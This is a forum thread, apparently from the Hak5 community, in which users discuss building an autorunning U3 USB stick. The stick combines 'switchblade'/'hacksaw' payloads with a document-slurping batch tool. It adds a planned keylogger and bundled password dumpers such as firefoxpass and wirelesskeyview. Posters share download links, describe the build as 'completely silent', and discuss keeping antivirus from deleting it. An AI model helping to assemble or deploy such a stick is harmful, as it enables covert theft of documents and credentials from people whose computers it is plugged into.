Hacksaw modification

Joe1986

Hi there,

Im new to the forum and the USB hacks. I recently downloaded the Gonzor payload and have been playing around putting it on a U3 4gb usb stick and bugging all of the machines in my house. I think its a great program, very useful! I just have a couple of questions, as im looking to modify some features slightly and wondered if anybody could help me.

1. I wondered if it would be possible to manipulate the hacksaw feature to capture specific folders (e.g. my documents) or if there was another program feature available that could do this?

2. If you could incorporate a keylogger feature into the payload or import a keylogger program into the custom iso?

Any help would be greatly appreciated.

Cheers,

Joe

hmm yes I adding the feature to deploy a keylogger onto the box would be a useful tool, but for the slurping of documents download the tool i made last night, http://hak5.org/forums/index.php?showtopic=13594

and go into the slurps folder, right click and edit the slurp.bat file to your liking. and just follow the instructions on my post.

Thanks Hakrat, great tool, just what I need! Is it possible to have it autorun at the same time as switchblade on the same USB stick or does it have to be a lone program? It would be great if I could configure to run both programs at once, automatically.

Cheers,

Joe

ok i finished combining non-u3 switchblade and MSlurp

its completely silent and works 110%

just put it on the root of your flash drive just like switchblade(non U3)

P.S. i added some apps including firefoxpass and wirelesskeyview ;D

the switch blade files will will be in the dump folder like usual and the slurped files will be on the root of the drive in a folder called *ComputerName*-PC

http://www.mediafire.com/download.php?bmfqhzkmxwn

if your using hacksaw U3 then you will haft to make a custom ISO.

i suggest using USB pocket knife. the non u3 version will haft to be modded to show up in auto run. but it has everything your looking for and more. you just need to configure it using the menu.bat file

Ill start writing some code that will run both MSlurp and Non-U3-Switch blade.

but if you have u3 switchblade then ou can run my program on auto run and U3 switch blade on U3

Thanks again HakRat, the non-U3 switchblade/mediaslurp download you created is very useful. I will make use of that with my non-u3 drives. However my priority at the moment is to use a u3 cruzer usb stick. Im currently using the gonzor payload, so that av cannot delete the switchblade programs from the u3 partition. Im a bit confused as to autorunning the mediaslurp program. I have extracted the mediaslurp folder to the flash root, which also contains the switchblade config software. How can I modify so that both programs autorun? I was thinking I could use an iso editor to include the media slurp feature within the custom u3 iso. Do you think this is possible or is there an easier way?

Ok, So ive managed to add HakRats mediaslurp function into the switchblade software inside the U3 iso. This now runs automatically along with the other features selected in the switchblade config exe. Ill upload this when its finished. Im nearly there, just having trouble with the files recovered via mediaslurp. At the moment, I have to physically define the flash partition within the mediaslurp 'slurp.bat' file (e.g. I:\system\log\slurp) which is a bit impractical as the path might change for different computers. Does anyone know how to define the flash partition universially, similar to the log file saved from switchblade so I can save the slurped files?